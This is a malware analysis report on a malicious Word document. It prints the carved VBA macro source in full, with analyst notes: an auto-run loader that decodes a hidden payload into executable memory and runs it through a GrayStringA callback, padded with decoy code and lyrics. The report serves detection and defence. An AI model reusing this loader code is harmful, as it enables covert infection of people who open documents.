Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 58915bb0388161b7…

MALICIOUS

Office (OLE)

194.0 KB Created: 2017-02-13 12:32:00 Authoring application: Microsoft Office Word First seen: 2018-03-04
MD5: c21b44bae0fc89e994ac9c6e6f9b5fcb SHA-1: f8658c498ce98102535057f4f997e0405324b5f9 SHA-256: 58915bb0388161b7214710c32de0a1e44c09c28c5d8b720b3284f99b82551da9
90 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros, as indicated by the 'OLE_VBA_MACROS' and 'ClamAV: Doc.Dropper.ZwMacros-6057750-0' heuristics. The 'Document_Open macro' firing suggests the malicious code executes automatically upon opening. The VBA script, though truncated, appears to be involved in executing further malicious actions, likely downloading a payload; note, however, that the extracted 'whist' module declares aliased imports of NtAllocateVirtualMemory, NtWriteVirtualMemory and GrayStringA, which the Document_Open call chain (conventionality → whist.charon → achondrite → convinced) uses to decode a string stored in a form control into executable memory — behaviour consistent with an in-memory loader rather than (or before) a network download. The presence of macros and the dropper signature strongly suggest a spearphishing attachment attack vector.

Heuristics 4

  • ClamAV: Doc.Dropper.ZwMacros-6057750-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.ZwMacros-6057750-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    End Function
    Private Sub Document_Open()
    Dim ambuscade As Variant
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. The URLs listed here are Adobe XMP, W3C RDF and Dublin Core namespace identifiers of the kind carried in embedded image metadata; none of them is referenced by the extracted macro code.
    URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/ In document text (OLE body)
    • http://purl.org/dc/elements/1.1/ In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 15160 bytes
SHA-256: 8c3b5af7c6191e63cf077db908cbaf689e6a0992aa30e12172e4f468d5ba2ad7
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Analyst note: module "ThisDocument" of the carved macros.bas (olevba output). It holds the
' auto-run entry point Document_Open and the call chain Document_Open -> conventionality ->
' whist.charon -> achondrite -> convinced, plus a decoy routine (MyTestArray) that nothing in
' the visible code calls. Identifiers are dictionary words; Option Explicit is off, so the many
' assignments to undeclared names and every SYD()/NPer() result are write-only filler.
Sub MyTestArray()
    ' Decoy routine: keeps prompting until the user types one of A-D (case-insensitive).
    ' Nothing in the extracted macros calls it; it looks like pasted tutorial code.
    Dim choices(1 To 4) As String
    Dim answer As String
    Dim idx As Integer
    Dim matched As Boolean

    choices(1) = "A": choices(2) = "B": choices(3) = "C": choices(4) = "D"
    matched = False

    Do While Not matched
        answer = InputBox("Please enter your choice: (i.e. A,B,C or D)")
        For idx = LBound(choices) To UBound(choices)
            If UCase(answer) = UCase(choices(idx)) Then
                matched = True
                Exit For
            End If
        Next idx
    Loop
End Sub

Function convinced(allopathic, saints, sciagraph)
' Analyst note: wrapper around sabbath, which module "whist" declares as an alias of
' NtWriteVirtualMemory. The three arguments are passed through unchanged:
'   allopathic -> gymnogyps : destination address
'   saints     -> qubibble  : source buffer address
'   sciagraph  -> beret     : number of bytes to copy
' singlehearted = 71 + 87 - 159 evaluates to -1, the current-process pseudo handle, so every
' call writes inside the Word process itself; shattered is never assigned (0) and fills the
' bytes-written slot. The unused Dims, the assignments to undeclared names (advancement,
' misogamist, melodic) and the SYD() call whose result is never read are filler.
#If Win64 Then
Dim jugend As String
Dim corditis As Variant
Dim singlehearted As LongPtr
Dim gymnogyps As LongPtr
Dim shattered As LongPtr
Dim catsear As Byte
Dim qubibble As LongPtr
Dim beret As LongPtr
#Else
Dim gymnogyps As Long
Dim barachois As Long
Dim singlehearted As Long
Dim cheer As Integer
Dim qubibble As Long
Dim dicotyledonous As Integer
Dim shattered As Long
Dim cavesson As Integer
Dim beret As Long
Dim divisions As Byte
Dim crossclassification As Long
#End If
advancement = judaical
misogamist = barge Or 244
gymnogyps = allopathic
beret = sciagraph
melodic = effortlessly
qubibble = saints
almsgiver = 7
arose = 310
diplomatist = 37109
schoolchild = 108285
schoolchild = SYD(schoolchild, diplomatist, arose, almsgiver)

misogamist = conchoid * 4
' -1: the current-process pseudo handle.
singlehearted = 71 + 87 - 159
' NtWriteVirtualMemory(-1, destination, source, length, bytesWritten)
sabbath ByVal singlehearted, gymnogyps, qubibble, beret, shattered
melodic = melodic
End Function
Private Sub Document_Open()
' Analyst note: auto-run entry point — Word executes this when the document is opened, which
' is what the OLE_VBA_DOCOPEN heuristic flags. The only effective statement is the call to
' conventionality; the Dims, string literals and the NPer() call are filler whose results are
' never read.
Dim ambuscade As Variant
Dim catsup As Variant
sapphist = "bluffer"
climb = "pallescere"
' Hands off to the loader orchestrator.
conventionality
doctoral = 93
unconscionable = 31841
erotically = 230523
unconscionable = NPer(0.0788, doctoral, -23877, erotically, 0)
End Sub
Function achondrite(policyholder)
' Analyst note: stages the decoded buffer in executable memory inside the Word process.
' policyholder is the value returned by whist.charon (a String carrying raw decoded bytes).
'  1. convinced(VarPtr(soil), VarPtr(policyholder) + 8, assimilation): assimilation is 8 on
'     Win64 and 4 on Win32 (pointer size), so this copies the data pointer stored at offset 8
'     of the Variant into soil — soil now points at the raw bytes behind policyholder.
'  2. mercurous (= NtAllocateVirtualMemory, module "whist"): process handle -1 (self), base
'     febrifugal = 0 (kernel chooses), size bichromate = 9777, zero-bits 0,
'     injection = 4096 (MEM_COMMIT) and foolhardness = 127 - 98 + 35 = 64
'     (PAGE_EXECUTE_READWRITE) — an RWX region; the ByVal prefixes at the call site override
'     the ByRef parameters of the Declare.
'  3. convinced febrifugal, soil, 4384: copies 4384 bytes from the decoded buffer into it.
' Returns the allocation base (febrifugal). SYD()/Fix() lines and unused Dims are filler.
' Detection: an Office process calling NtAllocateVirtualMemory with PAGE_EXECUTE_READWRITE
' on its own handle followed by NtWriteVirtualMemory is a strong behavioural indicator.
Dim matting As Long
Dim armadillo As String
Dim onchorynchus As String
Dim inconsiderateness As Long
#If Win64 Then
Dim muskmelon As Long
Dim soil As LongPtr
' 122 - 103 + 47 - 58 = 8: size of a 64-bit pointer.
assimilation = 122 - 103 + 47 - 58
Dim febrifugal As LongPtr
Dim chrysochloris As Integer
Dim deepening As Byte
Dim bichromate As LongPtr
Dim cheerless As Long
#Else
Dim disjoined As Integer
Dim soil As Long
' 128 + 9 - 73 - 60 = 4: size of a 32-bit pointer.
assimilation = 128 + 9 - 73 - 60
Dim febrifugal As Long
Dim finder As Long
Dim bichromate As Long
Dim corker As String
Dim continuous As Long
#End If
' Pull the Variant's data pointer (offset 8) into soil via NtWriteVirtualMemory on self.
daytime = convinced(VarPtr(soil), VarPtr(policyholder) + 8, assimilation)
incredulously = -1
febrifugal = 0
' 72 - 15 - 57 = 0 (ZeroBits).
dromaeosaur = 72 - 15 - 57
bichromate = 9777
' 4096 = MEM_COMMIT.
injection = 4096
' 127 - 98 + 35 = 64 = PAGE_EXECUTE_READWRITE.
foolhardness = 127 - 98 + 35
' NtAllocateVirtualMemory(-1, &febrifugal, 0, &bichromate, MEM_COMMIT, PAGE_EXECUTE_READWRITE)
punkie = mercurous(ByVal incredulously, febrifugal, ByVal dromaeosaur, bichromate, ByVal injection, ByVal foolhardness)
perceptibility = Fix(246.3106 + 333)

judaical = "decrepit"

' Copy 4384 decoded bytes into the new RWX region.
convinced febrifugal, soil, 4384
his = 4
coloration = 234
thermos = 43612
weighty = 440897
weighty = SYD(weighty, thermos, coloration, his)

' Return the region base to the caller (conventionality).
achondrite = febrifugal
End Function
Sub conventionality()
' Analyst note: loader orchestrator, called from Document_Open.
'  - apocrypha = page count of this document; insulting.tessellation.Value = apocrypha + 9
'    selects an item of control "tessellation" on UserForm "insulting" (SelectedItem / .Name
'    suggest a TabStrip or MultiPage — inferred). The encoded payload is stored in that item's
'    .Name, so which item is read depends on the document's page count; presumably this acts
'    as an anti-analysis gate when the document is altered — confirm against the form data.
'  - mopsy = Right(capsid, 5844): the last 5844 characters of the item name, matching the 5844
'    bytes that whist.charon processes.
'  - unmitigable = whist.charon(mopsy): decodes them (per-byte shift, then base64) into raw bytes.
'  - carpospore = achondrite(...): copies the bytes into an RWX allocation and returns its base.
'  - asvins = carpospore + armchair, where armchair = 30 + 48 + 57 + 1177 = 1312 on Win64 or
'    (74 - 128 + 36 + 513) + 2659 = 3154 on Win32.
'  - chauvinist (= GrayStringA, module "whist") is called with asvins as its third argument;
'    that parameter is a callback-function pointer, so the call transfers control into the
'    allocated buffer at that offset while the remaining arguments are 1/0 placeholders.
' Everything else (string literals, SYD/NPer calls, extra Dims) is filler.
' Detection: GrayStringA invoked from WINWORD.EXE with an lpOutputFunc inside a freshly
' committed RWX region is the behavioural signature of this loader.
Dim amendment As Long
Dim poetic As Integer
' Page count of the open document drives the form-control selection.
apocrypha = ThisDocument.ComputeStatistics(wdStatisticPages)
insulting.tessellation.Value = apocrypha + 9
despicably = "backset"
fibril = "jolterhead"
dished = "amentes"
Set geneva = insulting.tessellation.SelectedItem
alterd = 2
impale = 155
voces = 15903
beati = 125985
beati = SYD(beati, voces, impale, alterd)

' The encoded payload lives in the selected item's Name property.
capsid = geneva.Name
deadpan = 5844
mopsy = Right(capsid, deadpan)
' Decode to raw bytes.
unmitigable = whist.charon(mopsy)
cultivation = 92
amphibiotic = 18710
sensorial = 389352
amphibiotic = NPer(0.0391, cultivation, -13510, sensorial, 1)

coronat = "misinformation"
#If Win64 Then
Dim illaudable As String
Dim carpospore As LongPtr
Dim asvins As LongPtr
Dim basswood As Integer
#Else
Dim bitartrate As Byte
Dim asvins As Long
Dim basilisk As Integer
Dim carpospore As Long
#End If
ruination = 0
benzodiazepine = "je" & "wel"
dominated = 4096
abdominocentesis = 74
captivate = 5394
reside = 343866
captivate = NPer(0.0781, abdominocentesis, -15603, reside, 0)

dalasi = "backdrop"
johannesburg = "re" & "munerative"
disposal = "fosse"
deific = "gambian"
destiny = 2
mum = 362
oedematous = 11965
confront = 484049
confront = SYD(confront, oedematous, mum, destiny)

irritably = unmitigable
enlightenment = "uninjured"
' Stage the bytes in RWX memory; carpospore = allocation base.
carpospore = achondrite(irritably)
cacique = "vaquero"
#If Win64 Then
Dim sobriety As Long
Dim chor As LongPtr
malgre = "events"
billing = "endorse"
Dim chemist As LongPtr
' 1312: entry-point offset into the buffer on 64-bit Office.
armchair = 30 + 48 + 57 + 1177
#Else
artistically = "aggl" & "utinogen"
glue = "vidi"
Dim chor As Long
' 495 + 2659 = 3154: entry-point offset on 32-bit Office.
sentimentalist = 74 - 128 + 36 + 513
Dim chemist As Long
armchair = sentimentalist + 2659

#End If
Dim cherty As Variant
Dim confirmatory As Variant
chor = 0
asvins = carpospore + armchair
' 97 - 96 = 1: placeholder handle/count values.
chemist = 97 - 96
' GrayStringA(1, 1, lpOutputFunc = asvins, 0, 1, 0, 0, 0, 0): the callback pointer is the
' decoded buffer, so this is the point where control leaves VBA.
largess = chauvinist(chemist, chemist, asvins, chor, chemist, chor, chor, chor, chor)
styphelia = 118
exfoliate = 8125
addlehead = 379114
exfoliate = NPer(0.0832, styphelia, -8500, addlehead, 0)

End Sub


Attribute VB_Name = "whist"
' Analyst note: module "whist" holds the Win32/NT API imports under misleading aliases; the
' comment lines between them are song lyrics used as padding. Only three imports are referenced
' by the visible code: sabbath (NtWriteVirtualMemory, via convinced), mercurous
' (NtAllocateVirtualMemory, via achondrite) and chauvinist (GrayStringA, via conventionality).
' The others (PathFileExists, SHChangeNotification_Lock, SHGetSettings, ReadConsoleW,
' SHGetDesktopFolder) are declared in both bitness branches but never called in the extracted
' source — presumably to dilute the import list. Note the trailing spaces in Lib "Ntdll.dll  "
' and the mangled parameter names antrumByVal / dermByVal (a "ByVal" fused into the name),
' which are harmless to VBA but useful as signature material. The decoder helpers charon,
' bead and nichrome follow the declarations.
' From the back to the middle to the front
'
' Get it right, all night
#If Win64 Then
' Cause I like your skinny-jeans better
' From the dark to the light
' Cause I like your skinny-jeans better
Public Declare PtrSafe Function stripmined Lib "Shlwapi.dll" Alias "PathFileExists" (brucke As LongPtr) As LongPtr
' Cause I like your skinny-jeans better
' From the dark to the light
' Cause I like your skinny-jeans better
Public Declare PtrSafe Function consternation Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (brimstone As LongPtr, usurper As Any,assume As LongPtr, squiggle As Any) As Boolean
' Cause I like your skinny-jeans better
' From the dark to the light
' Cause I like your skinny-jeans better
Public Declare PtrSafe Function apterous Lib "Shell32.dll" Alias "SHGetSettings" (maquis As LongPtr,compline As LongPtr) As LongPtr
' Cause I like your skinny-jeans better
' From the dark to the light
' Cause I like your skinny-jeans better
Public Declare PtrSafe Function nicely Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal closed As LongPtr,chives As LongPtr,bilabial As LongPtr,scandium As LongPtr,aflame As LongPtr) As Boolean
' Cause I like your skinny-jeans better
' From the dark to the light
' Cause I like your skinny-jeans better
' [used] NtWriteVirtualMemory — called from convinced() with the current-process handle.
Public Declare PtrSafe Function sabbath Lib "Ntdll.dll  " Alias "NtWriteVirtualMemory" (ByVal femtogram As Any, ByVal barded As Any, ByVal orbignya As Any, ByVal ideogram As Any, ByVal crusade As Any) As LongPtr
' When they’re laying on the ground
' To the edge of the night to the light
' Baby we should get it right
Public Declare PtrSafe Function auspicious Lib "Shell32.dll" Alias "SHGetDesktopFolder" (pneumatology As LongPtr)
'
' From the dark to the light
' Just gimme one day, I teach ‘em girls how to chill
' [used] GrayStringA — called from conventionality(); its third parameter is a callback pointer.
Public  Declare PtrSafe Function chauvinist Lib "User32.dll" Alias "GrayStringA" ( ByVal selfseeded As Any, ByVal survivance As Any, ByVal kobold As Any, ByVal lockout As Any, ByVal graphite As Any, ByVal artifice As Any, ByVal maharashtra As Any, ByVal story As Any, ByVal reechy As Any) As Long
' I know what you want, Baby, I'mma give it to you real good
' But they don’t know your appeal
' B-B-B-Baby, I'mma give it to you real good
' [used] NtAllocateVirtualMemory — called from achondrite() to commit an RWX region.
Public Declare PtrSafe Function mercurous Lib "ntdll.dll" Alias "NtAllocateVirtualMemory" (embassy As LongPtr, amylolysis As LongPtr, ByVal nasci As LongPtr,antrumByVal As LongPtr, reversibility As LongPtr, ByVal transiently As LongPtr) As LongPtr
' Doubledecker Tourbus, meet me on the top-floor
'
' Get high! L-L-Light it up! R-R-Raise that cup!

' I know what your friends say
' Get it right, all night
' From the dark to the light
#Else
' From the back to the middle to the front
'
' Put your motherfucking hands up!
Public Declare Function sonography Lib "Shell32.dll" Alias "SHGetDesktopFolder" (exaltation As Long)
' Put your motherfucking hands up!
' Get it right, all night
' Baby let me get it right
Public Declare Function counterfactuality Lib "Shlwapi.dll" Alias "PathFileExists" (centromere As Long) As Long
' Put your motherfucking hands up!
' Cause I like your skinny-jeans better
' From the back to the middle to the front
Public Declare Function cassino Lib "Shell32.dll" Alias "SHGetSettings" (blandiment As Long, duds As Long) As Long
' B-B-B-Baby, I'mma give it to you real good
' Back in L.A., oop! It’s a nice day
' Baby we should get it right
Public Declare Function derringdo Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal conjunct As Long, glories As Long, uisquebaugh As Long, devil As Long, militare As Long) As Boolean
' Let’s make love, I never wanna fight
' Baby we gotta shop, we should get it right
' Baby let me get it right
' [used] NtWriteVirtualMemory — 32-bit counterpart of the declaration above.
Public Declare Function sabbath Lib "Ntdll.dll  " Alias "NtWriteVirtualMemory" (ByVal bushed As Any, ByVal proterochampsa As Any, ByVal glottology As Any, ByVal hobglobin As Any, ByVal daphnia As Any) As Long
' Cruisin’ down sunset, lightning up a fat one
' From the dark to the light
' Just gimme one day, I teach ‘em girls how to chill
' [used] GrayStringA — 32-bit counterpart of the declaration above.
Public Declare Function chauvinist Lib "User32.dll" Alias "GrayStringA" (ByVal outermost As Any, ByVal acroamatical As Any, ByVal callousness As Any, ByVal draggletailed As Any, ByVal immigrant As Any, ByVal microcosmic As Any, ByVal modal As Any, ByVal alternity As Any, ByVal negroid As Any) As Long
' From the dark to the light
' When they’re laying on the ground
' I know what your friends say
' [used] NtAllocateVirtualMemory — 32-bit counterpart of the declaration above.
Public Declare Function mercurous Lib "Ntdll.dll" Alias "NtAllocateVirtualMemory" (airtoair As Long, accede As Long, ByVal draft As Long, dermByVal As Long, perusal As Long, ByVal waiter As Long) As Long
' From the back to the middle to the front
' It looks like I’m about to get in trouble here
' I know what your friends say
Public Declare Function stonecolored Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (teach As Long, gobs As Any, theosophical As Long, embellished As Any) As Boolean
' You know the song baby, tryin’ to get my top score
' Back in L.A., oop! It’s a nice day
' You make me feel good

' It looks like I’m about to get in trouble here
' Baby let me get it right
' Back in L.A., oop! It’s a nice day
#End If
'
' But I think we vibed girl we should get it right
' Put your motherfucking hands up!
Function glutelin(machine)
    ' Returns the Unicode code point of the first character of machine (plain AscW wrapper).
    ' Not referenced by the rest of the extracted macros.
    Dim codePoint
    codePoint = AscW(machine)
    glutelin = codePoint
End Function
Sub pageNumber()
    ' Decoy: writes a centred "Page <n> of <total>" into the primary header of the last
    ' section. Ordinary Word automation; nothing in the loader chain calls it.
    Dim lastSection As Object
    Set lastSection = ActiveDocument.Sections(ActiveDocument.Sections.Count)
    lastSection.Headers(wdHeaderFooterPrimary).Range.Select

    Selection.Paragraphs(1).Alignment = wdAlignParagraphCenter
    Selection.TypeText Text:="Page "
    Selection.Fields.Add Range:=Selection.Range, Type:=wdFieldEmpty, Text:="PAGE ", PreserveFormatting:=True
    Selection.TypeText Text:=" of "
    Selection.Fields.Add Range:=Selection.Range, Type:=wdFieldEmpty, Text:="NUMPAGES ", PreserveFormatting:=True
End Sub

Function charon(roland) As String
' Analyst note: payload decoder. roland is the 5844-character string sliced from the
' form-control item name in conventionality; the function returns the decoded bytes
' (assigning the Byte array freak to the String return coerces it, so the caller receives a
' String holding raw bytes, which achondrite then dereferences through its Variant pointer).
' Stage 1 (first For loop): convert to ANSI bytes, then add 25 to even-indexed bytes and 24 to
'   odd-indexed ones (sampling = Sqr(100) / Sqr(4) + 20 = 25) — undoes a per-byte shift.
' Stage 2 (remaining loops): standard base64 decoding. criticise = nichrome() is the
'   reverse-alphabet table; compress / normandie / bitten hold i*64, i*4096 and i*262144
'   (bead mode 42 = multiply), i.e. the weights of the four 6-bit digits. Each group of four
'   characters (dibs advances by 4) becomes three bytes via bead mode 34 (And with
'   0xFF0000 / 0xFF00 / 0xFF) and bead mode 24 (\ 65536, \ 256). 5844 chars -> 4383 bytes
'   written into freak(0..6965), which is larger than needed.
' Everything else (SYD/Fix/Rnd calls, assignments to undeclared names, unused Dims) is filler.
Dim normandie(63) As Long
Dim screen As String
Dim bitten(63) As Long
Dim fenugreek As Long

judaical = melodic

' Output buffer for the decoded bytes.
Dim freak(6965) As Byte
melodic = "nornal"

Dim abdicable As Integer

Dim compress(63) As Long
Dim achillean As Long
Dim monger() As Byte
misogamist = Rnd(395.1295 + 291)

Dim brachypterous As Integer
Dim bitters As Long
Dim dibs As Long
Dim marut As Long

Dim bowiea As Long
Dim cloudlessness As Long

' 256, 0xFF0000, 64: divisor / mask / digit weight used by the base64 step.
nervos = 46 + 46 - 126 + 290
flameproof = 16711680
belonidae = 76 - 12
Dim calotte As Variant

' 65536, 255, 4096 and 262144 complete the mask / weight set.
crabwise = 43 + 65493
beefy = 255
thompson = 4032
fasteners = 63
unhelpfulness = 262144
advisemement = 16515072
psycholinguistics = 258048
acanthisitta = 105 + 65175
exposition = 4096
Dim wf As Long

Dim icepail As Long
bungee = 0
bye = 5843
Dim polymorph() As Byte
' ANSI byte view of the input string.
polymorph = VBA.StrConv(roland, vbFromUnicode)
Dim sowbelly As String
atticism = 7
adamantean = 219
eloquent = 41409
precisian = 360620
precisian = SYD(precisian, eloquent, adamantean, atticism)

' 5843: last index processed (5844 bytes).
bubulcus = 5843
noticeable = 113 - 78
' Sqr(100) / Sqr(4) + 20 = 25.
sampling = Sqr(100) / Sqr(4) + 20
' Stage 1: per-byte shift (+25 at even indices, +24 at odd ones).
For burhinus = 0 To bubulcus
If burhinus Mod 2 = 0 Then
polymorph(burhinus) = polymorph(burhinus) + sampling
Else
polymorph(burhinus) = polymorph(burhinus) + sampling - 1
End If
Next burhinus
conservatively = 3
inhospitably = 124
deuteron = 25375
crangonidae = 167794
crangonidae = SYD(crangonidae, deuteron, inhospitably, conservatively)

brachypterous = 0
hypothermic = 101 - 101
errors = 41 - 90 - 44 + 136
' Base64 reverse-alphabet lookup table (see nichrome).
criticise = nichrome
' Digit weights: compress(i) = i * 64, normandie(i) = i * 4096, bitten(i) = i * 262144.
For achillean = 0 To 63
compress(achillean) = bead(achillean, belonidae, 42)
normandie(achillean) = bead(achillean, exposition, 42)
bitten(achillean) = bead(achillean, unhelpfulness, 42)
Next achillean
antipodean = 8
cascarilla = 206
furtive = 31829
metaphrastic = 233652
metaphrastic = SYD(metaphrastic, furtive, cascarilla, antipodean)

monger = polymorph
digester = 120 - 88 - 28
gettable = 5
eos = 273
derogative = 43551
bordering = 306131
bordering = SYD(bordering, derogative, eos, gettable)

surfer = 3
effortlessly = "augustine"

perceptibility = Fix(498.2053 + 259)

contort = surfer + 1
amability = 2
' Stage 2: four 6-bit digits -> 24-bit value -> three output bytes.
For dibs = 0 To bubulcus
emasculation = monger(dibs)
Maximum = monger(dibs + 2)
bowiea = bitten(criticise(emasculation)) _
 + normandie(criticise(monger(dibs + 1))) + compress(criticise(Maximum)) + criticise(monger(dibs + surfer))
' (bowiea And 0xFF0000) \ 65536
achillean = bead(bowiea, flameproof, 34)
freak(bitters) = bead(achillean, crabwise, 24)
' (bowiea And 0xFF00) \ 256
achillean = bead(bowiea, acanthisitta, 34)
freak(bitters + 1) = bead(achillean, nervos, 24)
' bowiea And 0xFF
freak(bitters + amability) = bead(bowiea, beefy, 34)
bitters = bitters + amability + 1
' Together with Next this advances dibs by 4 per group.
dibs = dibs + 3
Next
' Byte array -> String coercion; the caller treats the result as raw bytes.
charon = freak
End Function

Function bead(pelisse, resentfully, humilia)
' Analyst note: opaque arithmetic dispatcher used by charon. humilia selects the operation
' applied to pelisse and resentfully: 24 = integer division, 34 = bitwise And,
' 42 = multiplication. Any other selector leaves the Variant return Empty.
Select Case humilia
Case 24
bead = pelisse \ resentfully
Case 34
bead = pelisse And resentfully
Case 42
bead = pelisse * resentfully
End Select
End Function
Function nichrome()
' Analyst note: builds the 256-entry reverse lookup table of the standard base64 alphabet:
'   'A'..'Z' (65..90)  -> 0..25
'   '0'..'9' (48..57)  -> 52..61
'   'a'..'z' (97..122) -> 26..51
'   '/' (47)           -> 63
'   '+' (43)           -> 62
' charon indexes this table with each shifted input byte.
Dim chaetodipterus(255) As Byte
asexually = 65
Do
chaetodipterus(asexually) = asexually - 65
asexually = asexually + 1
Loop Until asexually = 91
asexually = 48
Do
chaetodipterus(asexually) = asexually + 4
asexually = asexually + 1
Loop Until asexually = 58
asexually = 97
Do
chaetodipterus(asexually) = asexually - 71
asexually = asexually + 1
Loop Until asexually = 123
chaetodipterus(47) = 63
asexually = 43
chaetodipterus(asexually) = 62
nichrome = chaetodipterus
End Function


Attribute VB_Name = "insulting"
Attribute VB_Base = "0{59E5345E-F049-4648-BC01-657592E2174E}{A0FA8C3B-80D3-433D-A68C-5FDA614CF6BA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Analyst note: module "insulting" — the VB_Base value with two GUIDs is consistent with a
' UserForm designer module (inferred). conventionality reads insulting.tessellation, selecting
' an item by the document's page count and taking the encoded payload from that item's .Name,
' so the form's designer storage (not part of this macros.bas carve) is where the payload is
' kept and should be extracted for full analysis.